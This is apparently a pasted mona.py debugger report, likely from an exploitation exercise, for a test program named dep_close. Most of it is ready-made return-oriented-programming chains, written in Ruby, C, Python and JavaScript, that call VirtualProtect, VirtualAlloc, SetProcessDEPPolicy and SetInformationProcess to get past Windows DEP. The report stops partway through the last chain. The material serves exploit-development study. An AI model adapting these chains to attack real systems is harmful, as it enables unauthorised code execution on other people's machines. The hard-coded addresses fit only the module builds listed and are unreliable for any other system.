@xinali
Created November 28, 2018 13:44
================================================================================
Output generated by mona.py v2.0, rev 576 - Immunity Debugger
Corelan Team - https://www.corelan.be
================================================================================
OS : post2008server, release 6.2.9200
Process being debugged : dep_close (pid 3416)
Current mona arguments: rop -m kernel32.dll,ntdll.dll
================================================================================
2017-11-06 15:40:06
================================================================================
-----------------------------------------------------------------------------------------------------------------------------------------
Module info :
-----------------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
-----------------------------------------------------------------------------------------------------------------------------------------
0x754c0000 | 0x75597000 | 0x000d7000 | True | True | True | False | True | 6.3.9600.18217 [KERNELBASE.dll] (C:\Windows\SYSTEM32\KERNELBASE.dll)
0x74da0000 | 0x74e40000 | 0x000a0000 | True | True | True | False | True | 6.3.9600.16384 [apphelp.dll] (C:\Windows\system32\apphelp.dll)
0x75340000 | 0x75480000 | 0x00140000 | True | True | True | False | True | 6.3.9600.18217 [KERNEL32.DLL] (C:\Windows\SYSTEM32\KERNEL32.DLL)
0x000f0000 | 0x000f6000 | 0x00006000 | True | True | False | False | False | -1.0- [dep_close.exe] (E:\pwn2exploit\dep_close\Release\dep_close.exe)
0x77a60000 | 0x77bcf000 | 0x0016f000 | True | True | True | False | True | 6.3.9600.18217 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
0x715c0000 | 0x7167f000 | 0x000bf000 | True | True | False | False | True | 10.00.40219.325 [MSVCR100.dll] (C:\Windows\SYSTEM32\MSVCR100.dll)
-----------------------------------------------------------------------------------------------------------------------------------------
################################################################################
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x753afcd8, # POP EAX # RETN [KERNEL32.DLL]
0x753c0718, # ptr to &VirtualProtect() [IAT KERNEL32.DLL]
0x7539e737, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
0x75383d46, # XCHG EAX,ESI # RETN [KERNEL32.DLL]
0x75395d0e, # POP EBP # RETN [KERNEL32.DLL]
0x75356dc7, # & call esp [KERNEL32.DLL]
0x77abad7c, # POP EBX # RETN [ntdll.dll]
0x00000201, # 0x00000201-> ebx
0x77aa0b00, # POP EDX # RETN [ntdll.dll]
0x00000040, # 0x00000040-> edx
0x77b5b611, # POP ECX # RETN [ntdll.dll]
0x754403ed, # &Writable location [KERNEL32.DLL]
0x77a8869d, # POP EDI # RETN [ntdll.dll]
0x77b40883, # RETN (ROP NOP) [ntdll.dll]
0x7536af02, # POP EAX # RETN [KERNEL32.DLL]
0x90909090, # nop
0x77aefb99, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
# (rop_chain is the packed 68-byte string, 17 little-endian dwords in stack order)
rop_chain = create_rop_chain()
*** [ C ] ***
/*
 * Declare `name` as an unsigned int array sized by a first, size-only call
 * (buf == NULL) and fill it with a second call; `name##_length` keeps the
 * size in bytes.  The array is a C99 VLA on the stack.  Extra macro
 * arguments are forwarded to create_rop_chain() as chain parameters.
 * NOTE(review): with no extra arguments the GNU `, ##__VA_ARGS__` form
 * drops the comma, so the expansion is create_rop_chain(NULL) while the
 * function as emitted declares two parameters - confirm the call compiles
 * once the chain's parameter list has been filled in.
 */
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
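/*
 * Copy the VirtualProtect() ROP chain that mona.py generated for the
 * dep_close process into `buf`, or only report its size.
 *
 * buf:        destination for the packed gadget words, or NULL to query the
 *             size only (CREATE_ROP_CHAIN relies on this two-call pattern).
 * unused_arg: placeholder mona emits for chain parameters; this chain has
 *             none, so it is ignored.  It is named because an unnamed
 *             parameter in a function definition is not valid C before C23.
 * returns:    size of the chain in bytes (sizeof rop_gadgets, 68 here).
 *
 * The addresses are only meaningful for the module builds listed in the
 * header above (KERNEL32.DLL / ntdll.dll 6.3.9600.18217, both ASLR=True).
 */
int create_rop_chain(unsigned int *buf, unsigned int unused_arg)
{
    /* rop chain generated with mona.py - www.corelan.be */
    static const unsigned int rop_gadgets[] = {
        0x753afcd8, /* POP EAX // RETN [KERNEL32.DLL] */
        0x753c0718, /* ptr to &VirtualProtect() [IAT KERNEL32.DLL] */
        0x7539e737, /* MOV EAX,DWORD PTR DS:[EAX] // RETN [KERNEL32.DLL] */
        0x75383d46, /* XCHG EAX,ESI // RETN [KERNEL32.DLL] */
        0x75395d0e, /* POP EBP // RETN [KERNEL32.DLL] */
        0x75356dc7, /* & call esp [KERNEL32.DLL] */
        0x77abad7c, /* POP EBX // RETN [ntdll.dll] */
        0x00000201, /* 0x00000201-> ebx */
        0x77aa0b00, /* POP EDX // RETN [ntdll.dll] */
        0x00000040, /* 0x00000040-> edx */
        0x77b5b611, /* POP ECX // RETN [ntdll.dll] */
        0x754403ed, /* &Writable location [KERNEL32.DLL] */
        0x77a8869d, /* POP EDI // RETN [ntdll.dll] */
        0x77b40883, /* RETN (ROP NOP) [ntdll.dll] */
        0x7536af02, /* POP EAX // RETN [KERNEL32.DLL] */
        0x90909090, /* nop */
        0x77aefb99, /* PUSHAD // RETN [ntdll.dll] */
    };

    (void)unused_arg;
    if (buf != NULL) {
        memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    }
    return (int)sizeof(rop_gadgets);
}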
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
// (a stack VLA sized by the macro's first NULL-buffer call; rop_chain_length
// holds its size in bytes - 68 for this 17-dword chain)
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
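def create_rop_chain():
    """Return the VirtualProtect() ROP chain as packed little-endian bytes.

    The gadget addresses were generated by mona.py for the dep_close process
    described in the header above and are only valid for the module builds
    listed there (KERNEL32.DLL / ntdll.dll 6.3.9600.18217, both ASLR=True).

    Returns:
        bytes: the 17 gadget words packed as ``<I`` (little-endian uint32),
        68 bytes in total.
    """
    # struct is not imported anywhere in the generated snippet; import it
    # locally so the function is self-contained.
    import struct

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x753afcd8,  # POP EAX # RETN [KERNEL32.DLL]
        0x753c0718,  # ptr to &VirtualProtect() [IAT KERNEL32.DLL]
        0x7539e737,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
        0x75383d46,  # XCHG EAX,ESI # RETN [KERNEL32.DLL]
        0x75395d0e,  # POP EBP # RETN [KERNEL32.DLL]
        0x75356dc7,  # & call esp [KERNEL32.DLL]
        0x77abad7c,  # POP EBX # RETN [ntdll.dll]
        0x00000201,  # 0x00000201-> ebx
        0x77aa0b00,  # POP EDX # RETN [ntdll.dll]
        0x00000040,  # 0x00000040-> edx
        0x77b5b611,  # POP ECX # RETN [ntdll.dll]
        0x754403ed,  # &Writable location [KERNEL32.DLL]
        0x77a8869d,  # POP EDI # RETN [ntdll.dll]
        0x77b40883,  # RETN (ROP NOP) [ntdll.dll]
        0x7536af02,  # POP EAX # RETN [KERNEL32.DLL]
        0x90909090,  # nop
        0x77aefb99,  # PUSHAD # RETN [ntdll.dll]
    ]
    # b''.join works on Python 2 (str is bytes) and Python 3 alike; the
    # original ''.join raises TypeError on Python 3 because struct.pack
    # returns bytes.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)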
# Packed 68-byte chain (17 little-endian dwords) in stack order.
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%ufcd8%u753a" + // 0x753afcd8 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u0718%u753c" + // 0x753c0718 : ,# ptr to &VirtualProtect() [IAT KERNEL32.DLL]
"%ue737%u7539" + // 0x7539e737 : ,# MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
"%u3d46%u7538" + // 0x75383d46 : ,# XCHG EAX,ESI # RETN [KERNEL32.DLL]
"%u5d0e%u7539" + // 0x75395d0e : ,# POP EBP # RETN [KERNEL32.DLL]
"%u6dc7%u7535" + // 0x75356dc7 : ,# & call esp [KERNEL32.DLL]
"%uad7c%u77ab" + // 0x77abad7c : ,# POP EBX # RETN [ntdll.dll]
"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
"%u0b00%u77aa" + // 0x77aa0b00 : ,# POP EDX # RETN [ntdll.dll]
"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
"%ub611%u77b5" + // 0x77b5b611 : ,# POP ECX # RETN [ntdll.dll]
"%u03ed%u7544" + // 0x754403ed : ,# &Writable location [KERNEL32.DLL]
"%u869d%u77a8" + // 0x77a8869d : ,# POP EDI # RETN [ntdll.dll]
"%u0883%u77b4" + // 0x77b40883 : ,# RETN (ROP NOP) [ntdll.dll]
"%uaf02%u7536" + // 0x7536af02 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u9090%u9090" + // 0x90909090 : ,# nop
"%ufb99%u77ae" + // 0x77aefb99 : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for SetInformationProcess() :
--------------------------------------------
EAX = SizeOf(ExecuteFlags) (0x4)
ECX = &ExecuteFlags (ptr to 0x00000002)
EDX = ProcessExecuteFlags (0x22)
EBX = NtCurrentProcess (0xffffffff)
ESP = ReturnTo (automatic)
EBP = ptr to NtSetInformationProcess()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------
ROP Chain for SetInformationProcess() [(XP/2003 Server only)] :
---------------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x75369e72, # POP EAX # RETN [KERNEL32.DLL]
0x753c0fb8, # ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
0x77af1ac0, # MOV EBP,DWORD PTR DS:[EAX] # RETN [ntdll.dll]
0x77aec770, # POP EDX # RETN [ntdll.dll]
0x00000022, # 0x00000022-> edx
0x753b41e2, # POP ECX # RETN [KERNEL32.DLL]
0x753c383c, # &0x00000002 [KERNEL32.DLL]
0x77aa0c6e, # POP EBX # RETN [ntdll.dll]
0xffffffff, # 0xffffffff-> ebx
0x75368537, # POP EAX # RETN [KERNEL32.DLL]
0x00000004, # 0x00000004-> eax
0x77a886d4, # POP EDI # RETN [ntdll.dll]
0x77a886d4, # skip 4 bytes [ntdll.dll]
0x77aefb99, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
# (rop_chain is the packed 56-byte string, 14 little-endian dwords in stack order)
rop_chain = create_rop_chain()
*** [ C ] ***
/*
 * Declare `name` as an unsigned int array sized by a first, size-only call
 * (buf == NULL) and fill it with a second call; `name##_length` keeps the
 * size in bytes.  The array is a C99 VLA on the stack.  Extra macro
 * arguments are forwarded to create_rop_chain() as chain parameters.
 * NOTE(review): with no extra arguments the GNU `, ##__VA_ARGS__` form
 * drops the comma, so the expansion is create_rop_chain(NULL) while the
 * function as emitted declares two parameters - confirm the call compiles
 * once the chain's parameter list has been filled in.
 */
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
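/*
 * Copy the SetInformationProcess() ROP chain that mona.py generated for the
 * dep_close process into `buf`, or only report its size.
 *
 * buf:        destination for the packed gadget words, or NULL to query the
 *             size only (CREATE_ROP_CHAIN relies on this two-call pattern).
 * unused_arg: placeholder mona emits for chain parameters; this chain has
 *             none, so it is ignored.  It is named because an unnamed
 *             parameter in a function definition is not valid C before C23.
 * returns:    size of the chain in bytes (sizeof rop_gadgets, 56 here).
 *
 * mona labels this chain "XP/2003 Server only" while the header reports
 * release 6.2.9200; the addresses are tied to the module builds listed
 * there (KERNEL32.DLL / ntdll.dll 6.3.9600.18217, both ASLR=True).
 */
int create_rop_chain(unsigned int *buf, unsigned int unused_arg)
{
    /* rop chain generated with mona.py - www.corelan.be */
    static const unsigned int rop_gadgets[] = {
        0x75369e72, /* POP EAX // RETN [KERNEL32.DLL] */
        0x753c0fb8, /* ptr to &SetInformationProcess() [IAT KERNEL32.DLL] */
        0x77af1ac0, /* MOV EBP,DWORD PTR DS:[EAX] // RETN [ntdll.dll] */
        0x77aec770, /* POP EDX // RETN [ntdll.dll] */
        0x00000022, /* 0x00000022-> edx */
        0x753b41e2, /* POP ECX // RETN [KERNEL32.DLL] */
        0x753c383c, /* &0x00000002 [KERNEL32.DLL] */
        0x77aa0c6e, /* POP EBX // RETN [ntdll.dll] */
        0xffffffff, /* 0xffffffff-> ebx */
        0x75368537, /* POP EAX // RETN [KERNEL32.DLL] */
        0x00000004, /* 0x00000004-> eax */
        0x77a886d4, /* POP EDI // RETN [ntdll.dll] */
        0x77a886d4, /* skip 4 bytes [ntdll.dll] */
        0x77aefb99, /* PUSHAD // RETN [ntdll.dll] */
    };

    (void)unused_arg;
    if (buf != NULL) {
        memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    }
    return (int)sizeof(rop_gadgets);
}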
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
// (a stack VLA sized by the macro's first NULL-buffer call; rop_chain_length
// holds its size in bytes - 56 for this 14-dword chain)
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
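def create_rop_chain():
    """Return the SetInformationProcess() ROP chain as packed LE bytes.

    mona labels this chain "XP/2003 Server only" while the header above
    reports release 6.2.9200; its addresses are tied to the module builds
    listed there (KERNEL32.DLL / ntdll.dll 6.3.9600.18217, both ASLR=True).

    Returns:
        bytes: the 14 gadget words packed as ``<I`` (little-endian uint32),
        56 bytes in total.
    """
    # struct is not imported anywhere in the generated snippet; import it
    # locally so the function is self-contained.
    import struct

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x75369e72,  # POP EAX # RETN [KERNEL32.DLL]
        0x753c0fb8,  # ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
        0x77af1ac0,  # MOV EBP,DWORD PTR DS:[EAX] # RETN [ntdll.dll]
        0x77aec770,  # POP EDX # RETN [ntdll.dll]
        0x00000022,  # 0x00000022-> edx
        0x753b41e2,  # POP ECX # RETN [KERNEL32.DLL]
        0x753c383c,  # &0x00000002 [KERNEL32.DLL]
        0x77aa0c6e,  # POP EBX # RETN [ntdll.dll]
        0xffffffff,  # 0xffffffff-> ebx
        0x75368537,  # POP EAX # RETN [KERNEL32.DLL]
        0x00000004,  # 0x00000004-> eax
        0x77a886d4,  # POP EDI # RETN [ntdll.dll]
        0x77a886d4,  # skip 4 bytes [ntdll.dll]
        0x77aefb99,  # PUSHAD # RETN [ntdll.dll]
    ]
    # b''.join works on Python 2 (str is bytes) and Python 3 alike; the
    # original ''.join raises TypeError on Python 3 because struct.pack
    # returns bytes.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)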
# Packed 56-byte chain (14 little-endian dwords) in stack order.
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%u9e72%u7536" + // 0x75369e72 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u0fb8%u753c" + // 0x753c0fb8 : ,# ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
"%u1ac0%u77af" + // 0x77af1ac0 : ,# MOV EBP,DWORD PTR DS:[EAX] # RETN [ntdll.dll]
"%uc770%u77ae" + // 0x77aec770 : ,# POP EDX # RETN [ntdll.dll]
"%u0022%u0000" + // 0x00000022 : ,# 0x00000022-> edx
"%u41e2%u753b" + // 0x753b41e2 : ,# POP ECX # RETN [KERNEL32.DLL]
"%u383c%u753c" + // 0x753c383c : ,# &0x00000002 [KERNEL32.DLL]
"%u0c6e%u77aa" + // 0x77aa0c6e : ,# POP EBX # RETN [ntdll.dll]
"%uffff%uffff" + // 0xffffffff : ,# 0xffffffff-> ebx
"%u8537%u7536" + // 0x75368537 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u0004%u0000" + // 0x00000004 : ,# 0x00000004-> eax
"%u86d4%u77a8" + // 0x77a886d4 : ,# POP EDI # RETN [ntdll.dll]
"%u86d4%u77a8" + // 0x77a886d4 : ,# skip 4 bytes [ntdll.dll]
"%ufb99%u77ae" + // 0x77aefb99 : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for SetProcessDEPPolicy() :
--------------------------------------------
EAX = <not used>
ECX = <not used>
EDX = <not used>
EBX = dwFlags (ptr to 0x00000000)
ESP = ReturnTo (automatic)
EBP = ptr to SetProcessDEPPolicy()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------
ROP Chain for SetProcessDEPPolicy() [(XP SP3/Vista SP1/2008 Server SP1, can be called only once per process)] :
---------------------------------------------------------------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x77a6b8d7, # POP EBP # RETN [ntdll.dll]
0x75365620, # SetProcessDEPPolicy() [KERNEL32.DLL]
0x7539df4a, # POP EBX # RETN [KERNEL32.DLL]
0x75340011, # &0x00000000 [KERNEL32.DLL]
0x77a885c4, # POP EDI # RETN [ntdll.dll]
0x77a885c4, # skip 4 bytes [ntdll.dll]
0x77a8cd5c, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
# (rop_chain is the packed 28-byte string, 7 little-endian dwords in stack order)
rop_chain = create_rop_chain()
*** [ C ] ***
/*
 * Declare `name` as an unsigned int array sized by a first, size-only call
 * (buf == NULL) and fill it with a second call; `name##_length` keeps the
 * size in bytes.  The array is a C99 VLA on the stack.  Extra macro
 * arguments are forwarded to create_rop_chain() as chain parameters.
 * NOTE(review): with no extra arguments the GNU `, ##__VA_ARGS__` form
 * drops the comma, so the expansion is create_rop_chain(NULL) while the
 * function as emitted declares two parameters - confirm the call compiles
 * once the chain's parameter list has been filled in.
 */
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
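/*
 * Copy the SetProcessDEPPolicy() ROP chain that mona.py generated for the
 * dep_close process into `buf`, or only report its size.
 *
 * buf:        destination for the packed gadget words, or NULL to query the
 *             size only (CREATE_ROP_CHAIN relies on this two-call pattern).
 * unused_arg: placeholder mona emits for chain parameters; this chain has
 *             none, so it is ignored.  It is named because an unnamed
 *             parameter in a function definition is not valid C before C23.
 * returns:    size of the chain in bytes (sizeof rop_gadgets, 28 here).
 *
 * mona labels this chain "XP SP3/Vista SP1/2008 Server SP1, can be called
 * only once per process" while the header reports release 6.2.9200; the
 * addresses are tied to the module builds listed there (KERNEL32.DLL /
 * ntdll.dll 6.3.9600.18217, both ASLR=True).
 */
int create_rop_chain(unsigned int *buf, unsigned int unused_arg)
{
    /* rop chain generated with mona.py - www.corelan.be */
    static const unsigned int rop_gadgets[] = {
        0x77a6b8d7, /* POP EBP // RETN [ntdll.dll] */
        0x75365620, /* SetProcessDEPPolicy() [KERNEL32.DLL] */
        0x7539df4a, /* POP EBX // RETN [KERNEL32.DLL] */
        0x75340011, /* &0x00000000 [KERNEL32.DLL] */
        0x77a885c4, /* POP EDI // RETN [ntdll.dll] */
        0x77a885c4, /* skip 4 bytes [ntdll.dll] */
        0x77a8cd5c, /* PUSHAD // RETN [ntdll.dll] */
    };

    (void)unused_arg;
    if (buf != NULL) {
        memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    }
    return (int)sizeof(rop_gadgets);
}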
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
// (a stack VLA sized by the macro's first NULL-buffer call; rop_chain_length
// holds its size in bytes - 28 for this 7-dword chain)
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
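def create_rop_chain():
    """Return the SetProcessDEPPolicy() ROP chain as packed LE bytes.

    mona labels this chain "XP SP3/Vista SP1/2008 Server SP1, can be called
    only once per process" while the header above reports release 6.2.9200;
    its addresses are tied to the module builds listed there (KERNEL32.DLL /
    ntdll.dll 6.3.9600.18217, both ASLR=True).

    Returns:
        bytes: the 7 gadget words packed as ``<I`` (little-endian uint32),
        28 bytes in total.
    """
    # struct is not imported anywhere in the generated snippet; import it
    # locally so the function is self-contained.
    import struct

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x77a6b8d7,  # POP EBP # RETN [ntdll.dll]
        0x75365620,  # SetProcessDEPPolicy() [KERNEL32.DLL]
        0x7539df4a,  # POP EBX # RETN [KERNEL32.DLL]
        0x75340011,  # &0x00000000 [KERNEL32.DLL]
        0x77a885c4,  # POP EDI # RETN [ntdll.dll]
        0x77a885c4,  # skip 4 bytes [ntdll.dll]
        0x77a8cd5c,  # PUSHAD # RETN [ntdll.dll]
    ]
    # b''.join works on Python 2 (str is bytes) and Python 3 alike; the
    # original ''.join raises TypeError on Python 3 because struct.pack
    # returns bytes.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)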
# Packed 28-byte chain (7 little-endian dwords) in stack order.
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%ub8d7%u77a6" + // 0x77a6b8d7 : ,# POP EBP # RETN [ntdll.dll]
"%u5620%u7536" + // 0x75365620 : ,# SetProcessDEPPolicy() [KERNEL32.DLL]
"%udf4a%u7539" + // 0x7539df4a : ,# POP EBX # RETN [KERNEL32.DLL]
"%u0011%u7534" + // 0x75340011 : ,# &0x00000000 [KERNEL32.DLL]
"%u85c4%u77a8" + // 0x77a885c4 : ,# POP EDI # RETN [ntdll.dll]
"%u85c4%u77a8" + // 0x77a885c4 : ,# skip 4 bytes [ntdll.dll]
"%ucd5c%u77a8" + // 0x77a8cd5c : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x753b71d2, # POP EAX # RETN [KERNEL32.DLL]
0x753c06fc, # ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
0x7539e737, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
0x75383d46, # XCHG EAX,ESI # RETN [KERNEL32.DLL]
0x753afa0b, # POP EBP # RETN [KERNEL32.DLL]
0x75356dc7, # & call esp [KERNEL32.DLL]
0x77ab89a9, # POP EBX # RETN [ntdll.dll]
0x00000001, # 0x00000001-> ebx
0x77a87065, # POP EDX # RETN [ntdll.dll]
0x00001000, # 0x00001000-> edx
0x77ab4a71, # POP ECX # RETN [ntdll.dll]
0x00000040, # 0x00000040-> ecx
0x77a8835c, # POP EDI # RETN [ntdll.dll]
0x77b40883, # RETN (ROP NOP) [ntdll.dll]
0x75369e72, # POP EAX # RETN [KERNEL32.DLL]
0x90909090, # nop
0x77a8cd5c, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
# (rop_chain is the packed 68-byte string, 17 little-endian dwords in stack order)
rop_chain = create_rop_chain()
*** [ C ] ***
/*
 * Declare `name` as an unsigned int array sized by a first, size-only call
 * (buf == NULL) and fill it with a second call; `name##_length` keeps the
 * size in bytes.  The array is a C99 VLA on the stack.  Extra macro
 * arguments are forwarded to create_rop_chain() as chain parameters.
 * NOTE(review): with no extra arguments the GNU `, ##__VA_ARGS__` form
 * drops the comma, so the expansion is create_rop_chain(NULL) while the
 * function as emitted declares two parameters - confirm the call compiles
 * once the chain's parameter list has been filled in.
 */
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
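/*
 * Copy the VirtualAlloc() ROP chain that mona.py generated for the
 * dep_close process into `buf`, or only report its size.
 *
 * buf:        destination for the packed gadget words, or NULL to query the
 *             size only (CREATE_ROP_CHAIN relies on this two-call pattern).
 * unused_arg: placeholder mona emits for chain parameters; this chain has
 *             none, so it is ignored.  It is named because an unnamed
 *             parameter in a function definition is not valid C before C23.
 * returns:    size of the chain in bytes (sizeof rop_gadgets, 68 here).
 *
 * The addresses are only meaningful for the module builds listed in the
 * header above (KERNEL32.DLL / ntdll.dll 6.3.9600.18217, both ASLR=True).
 */
int create_rop_chain(unsigned int *buf, unsigned int unused_arg)
{
    /* rop chain generated with mona.py - www.corelan.be */
    static const unsigned int rop_gadgets[] = {
        0x753b71d2, /* POP EAX // RETN [KERNEL32.DLL] */
        0x753c06fc, /* ptr to &VirtualAlloc() [IAT KERNEL32.DLL] */
        0x7539e737, /* MOV EAX,DWORD PTR DS:[EAX] // RETN [KERNEL32.DLL] */
        0x75383d46, /* XCHG EAX,ESI // RETN [KERNEL32.DLL] */
        0x753afa0b, /* POP EBP // RETN [KERNEL32.DLL] */
        0x75356dc7, /* & call esp [KERNEL32.DLL] */
        0x77ab89a9, /* POP EBX // RETN [ntdll.dll] */
        0x00000001, /* 0x00000001-> ebx */
        0x77a87065, /* POP EDX // RETN [ntdll.dll] */
        0x00001000, /* 0x00001000-> edx */
        0x77ab4a71, /* POP ECX // RETN [ntdll.dll] */
        0x00000040, /* 0x00000040-> ecx */
        0x77a8835c, /* POP EDI // RETN [ntdll.dll] */
        0x77b40883, /* RETN (ROP NOP) [ntdll.dll] */
        0x75369e72, /* POP EAX // RETN [KERNEL32.DLL] */
        0x90909090, /* nop */
        0x77a8cd5c, /* PUSHAD // RETN [ntdll.dll] */
    };

    (void)unused_arg;
    if (buf != NULL) {
        memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    }
    return (int)sizeof(rop_gadgets);
}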
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
// (a stack VLA sized by the macro's first NULL-buffer call; rop_chain_length
// holds its size in bytes - 68 for this 17-dword chain)
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
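def create_rop_chain():
    """Return the VirtualAlloc() ROP chain as packed little-endian bytes.

    The gadget addresses were generated by mona.py for the dep_close process
    described in the header above and are only valid for the module builds
    listed there (KERNEL32.DLL / ntdll.dll 6.3.9600.18217, both ASLR=True).

    Returns:
        bytes: the 17 gadget words packed as ``<I`` (little-endian uint32),
        68 bytes in total.
    """
    # struct is not imported anywhere in the generated snippet; import it
    # locally so the function is self-contained.
    import struct

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x753b71d2,  # POP EAX # RETN [KERNEL32.DLL]
        0x753c06fc,  # ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
        0x7539e737,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
        0x75383d46,  # XCHG EAX,ESI # RETN [KERNEL32.DLL]
        0x753afa0b,  # POP EBP # RETN [KERNEL32.DLL]
        0x75356dc7,  # & call esp [KERNEL32.DLL]
        0x77ab89a9,  # POP EBX # RETN [ntdll.dll]
        0x00000001,  # 0x00000001-> ebx
        0x77a87065,  # POP EDX # RETN [ntdll.dll]
        0x00001000,  # 0x00001000-> edx
        0x77ab4a71,  # POP ECX # RETN [ntdll.dll]
        0x00000040,  # 0x00000040-> ecx
        0x77a8835c,  # POP EDI # RETN [ntdll.dll]
        0x77b40883,  # RETN (ROP NOP) [ntdll.dll]
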